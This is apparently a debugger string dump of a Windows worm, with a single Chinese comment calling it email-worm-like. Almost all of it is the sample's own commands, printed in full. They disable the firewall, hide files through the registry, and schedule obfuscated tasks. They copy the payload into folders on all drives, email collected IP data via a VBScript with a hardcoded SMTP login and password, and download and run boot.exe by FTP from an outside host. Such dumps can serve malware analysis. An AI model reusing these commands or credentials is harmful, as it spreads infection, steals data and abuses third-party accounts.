这不是什么U盘病毒，而是类似于 email worm 的东西。
Ultra String Reference Plugin
Address Disassembly Text String
0040148C push 004078A0 (Initial CPU selection)
0040BCD7 push 00407E30 explorer.exe
0040BEB2 push 00407EAC C:\WINDOWS\system32\down.exe
0040BEBB push 00407E90 \
0040BEE8 push 00407E9C .exe
0040BF3E mov dword ptr [ebp-54], 00407EEC cmd /c at 2 | find /i "cmd /c cmd" && echo ok >1 >C:\WINDOWS\system32\ativco.txt &exit
0040BF77 mov dword ptr [ebp-54], 00407FA0 C:\WINDOWS\system32\ativco.txt
0040BFE1 mov dword ptr [ebp-54], 00407FEC cmd /c del C:\WINDOWS\system32\ativco.txt /q
0040C03B push 0040804C C:\WINDOWS\system32\ativcox.DLL
0040C053 push 00408090 reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
0040C06F push 0040822C reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
0040C08B push 00408314 reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
0040C0A7 push 00408420 ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^a^t^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^s^y^s^t^e^n^3^2^.^e^x^e
0040C0C3 push 0040852C net stop sharedaccess
0040C0DF push 0040855C sc stop sharedaccess
0040C0FB push 0040858C sc config schedule start= auto
0040C117 push 004085D0 net start schedule
0040C133 push 004083F4 sc start schedule
0040C14F push 00408170 systen32 /del /y
0040C16B push 004085FC for /L %i IN (3,3,58) DO systen32 9:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C187 push 004086E0 for /L %i IN (3,3,58) DO systen32 10:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1A3 push 004087C8 for /L %i IN (3,3,58) DO systen32 11:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1BF push 004088B0 for /L %i IN (3,3,58) DO systen32 12:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1DB push 00408998 for /L %i IN (3,3,58) DO systen32 13:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1F7 push 00408A80 for /L %i IN (3,3,58) DO systen32 14:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C213 push 00408B68 for /L %i IN (3,3,58) DO systen32 15:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C22F push 00408C50 for /L %i IN (3,3,58) DO systen32 16:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C24B push 00408D38 for /L %i IN (3,3,58) DO systen32 17:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C267 push 00408E20 for /L %i IN (3,3,58) DO systen32 18:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C283 push 00408F08 for /L %i IN (3,3,58) DO systen32 19:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C29F push 00408FF0 for /L %i IN (3,3,58) DO systen32 20:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2BB push 004090D8 for /L %i IN (3,3,58) DO systen32 21:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2D7 push 004091C0 for /L %i IN (3,3,58) DO systen32 22:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2F3 push 004092A8 for /L %i IN (3,3,58) DO systen32 23:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C30F push 00409390 for /L %i IN (12,1,23) DO systen32 %i:00:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\ATT.bat
0040C32B push 00409470 systen32 20:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C347 push 00409518 systen32 21:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C363 push 0040964C systen32 22:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C37F push 004096F4 systen32 23:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C39B push 0040980C systen32 00:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3B7 push 004098B4 systen32 00:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3D3 push 004099F4 systen32 01:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3EF push 00409A9C ipconfig /all >C:\WINDOWS\system32\a.txt
0040C40B push 00409AF4 for /f "delims=" %a in ('findstr "Address" C:\WINDOWS\system32\a.txt') do echo %a>>C:\WINDOWS\system32\b.txt
0040C427 push 00409BD4 for /f "delims=" %a in ('findstr "IP " C:\WINDOWS\system32\b.txt') do echo %a >>C:\WINDOWS\system32\c.txt
0040C45F push 00409DA8 del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt /q
0040C47B push 00409E8C C:\WINDOWS\system32\mail3.vbe
0040C497 push 00409F8C del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt
0040C4B3 push 0040A17C ATTRIB C:\WINDOWS\system32\mail3.vbe +s +h & ATTRIB C:\WINDOWS\system32\Attusb.dll +s +h & ATTRIB C:\WINDOWS\system32\autousb.ba
0040C4CF push 0040A2E8 exit
0040C509 push 00409E8C C:\WINDOWS\system32\mail3.vbe
0040C521 push 0040A2F8 On Error Resume Next
0040C53D push 0040A328 mailto="294503954@qq.com"
0040C559 push 0040A068 Dim fso, f
0040C575 push 0040A084 Set fso = CreateObject("Scripting.FileSystemObject")
0040C591 push 0040A0F4 Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
0040C5AD push 00409ECC mailbody=f.ReadAll
0040C5C9 push 00409EF8 f.Close
0040C5E5 push 00409F0C NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
0040C601 push 0040995C set Email = CreateObject("CDO.Message")
0040C61D push 004099B0 Email.From = "sunhopp@tom.com"
0040C639 push 00409D80 Email.To = mailto
0040C655 push 0040979C Email.Subject = mailbody
0040C671 push 004097D4 Email.Textbody = mailbody
0040C68D push 004095C0 with Email.Configuration.Fields
0040C6A9 push 00409604 .Item(NameSpace&"sendusing") = 2
0040C6C5 push 00408198 .Item(NameSpace&"smtpserver") = "smtp.tom.com"
0040C6E1 push 0040A360 .Item(NameSpace&"smtpserverport") = 25
0040C6FD push 0040A3B4 .Item(NameSpace&"smtpauthenticate") = 1
0040C719 push 0040A408 .Item(NameSpace&"sendusername") = "sunhopp"
0040C735 push 0040A464 .Item(NameSpace&"sendpassword") = "autocad"
0040C751 push 0040A4C0 .Update
0040C76D push 0040A4D4 end With
0040C789 push 0040A4EC Email.Send
0040C7A5 push 0040A508 Wscript.quit
0040C7D0 push 0040A528 C:\WINDOWS\system32\Attusb.dll
0040C7E8 push 0040A56C Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
0040C804 push 0040A5EC ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
0040C820 push 0040A718 ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^
0040C83C push 0040A82C Systen /c %SystemRoot%\system32\autousb.bat
0040C876 push 0040A888 C:\WINDOWS\system32\autousb.bat
0040C88E push 0040A8F8 setlocal EnableDelayedExpansion
0040C8AA push 0040A93C :1
0040C8C6 push 0040A948 fsutil fsinfo drives >%SystemRoot%\system32\output.txt
0040C8E2 push 0040A9BC find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
0040C8FE push 0040AA58 del %SystemRoot%\system32\output.txt /q
0040C91A push 0040AAE0 for /f %%i in (%SystemRoot%\system32\out.txt) do (
0040C952 push 0040AC00 )
0040C96E push 0040AC08 if not exist %SystemRoot%\system32\output.txt goto 3
0040C98A push 0040ACBC for /f %%r in (%SystemRoot%\system32\output.txt) do (
0040C9A6 push 0040AD2C set var=%%r
0040C9C2 push 0040AD48 cd /d !var!
0040C9DE push 0040AD64 dir /a:d-s /b > %SystemRoot%\system32\ok.txt
0040C9FA push 0040ADC4 for /f %%q in (%SystemRoot%\system32\ok.txt) do (
0040CA16 push 0040AE7C ATTRIB %%q /s /d +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
0040CA32 push 0040AF1C del %SystemRoot%\system32\ok.txt /q
0040CA4E push 0040AC00 )
0040CA6A push 0040AC00 )
0040CA86 push 0040AF68 :3
0040CAA2 push 0040AF74 EXPL0RER /n 10 127.0.1 &goto 1
0040CADC push 0040AFB8 C:\WINDOWS\system32\WIN.bat
0040CAF4 push 0040AFF4 @ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
0040CB10 push 0040AE2C @ if %ERRORLEVEL%==0 goto ok
0040CB2C push 0040AC78 @ if %ERRORLEVEL%==1 goto end
0040CB48 push 0040AE6C :ok
0040CB64 push 0040AAAC @ net stop sharedaccess
0040CB80 push 0040855C sc stop sharedaccess
0040CB9C push 0040B058 ^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
0040CBB8 push 0040B0BC @ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S
0040CBD4 push 0040B230 @ cmd /c sc config DNSSystem displayname= "System DNS"
0040CBF0 push 0040B2A4 @ cmd /c sc config DNSSystem type= interact type= own
0040CC28 push 0040B3E8 @ sc start DNSSystem
0040CC44 push 0040B418 %SystemRoot%\system32\SuCH0ST.exe
0040CC60 push 0040B460 @ exit
0040CC7C push 0040B474 :end
0040CC98 push 0040AAAC @ net stop sharedaccess
0040CCB4 push 0040855C sc stop sharedaccess
0040CCD0 push 0040B484 del boot.exe /q
0040CCEC push 0040B4A8 echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo bye >> 1.RMVB
0040CD08 push 0040B5B0 ftp -s:1.RMVB
0040CD24 push 0040B5D0 del 1.RMVB
0040CD40 push 0040A8CC ping 127.0.0.1 -n 3
0040CD5C push 0040A6F4 cmd /c boot.exe
0040CD78 push 004081FC ping 127.0.0.1 -n 10
0040CD94 push 0040B484 del boot.exe /q
0040CDB0 push 0040A2E8 exit
0040CDEA push 0040B5EC C:\WINDOWS\system32\idnd.dll
0040CE02 push 0040B62C at| find /i "cmd /c cmd" && exit
0040CE1E push 0040858C sc config schedule start= auto
0040CE3A push 004085D0 net start schedule
0040CE56 push 004083F4 sc start schedule
0040CE72 push 0040B674 set/a mm=%time:~3,2%
0040CE8E push 0040B6A4 set/a hh=%time:~0,2%
0040CEAA push 0040B6D4 set/a mm=%mm%+2
0040CEC6 push 0040B6F8 set/a a=%mm%
0040CEE2 push 0040B718 if %a%==60 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CEFE push 0040B784 if %a%==61 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF1A push 0040B7E4 if %a%==62 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF36 push 0040B844 if %a%==63 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF52 push 0040B8A4 if %a%==64 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF6E push 0040B914 at %hh%:%mm% cmd /c cmd ^<C:\WINDOWS\system32\ativcox.DLL
0040CF8A push 0040B990 del C:\WINDOWS\system32\idnd.dll /q
0040CFA6 push 0040A2E8 exit
0040CFD1 mov dword ptr [ebp-54], 0040B9DC cmd /c cmd <C:\WINDOWS\system32\idnd.dll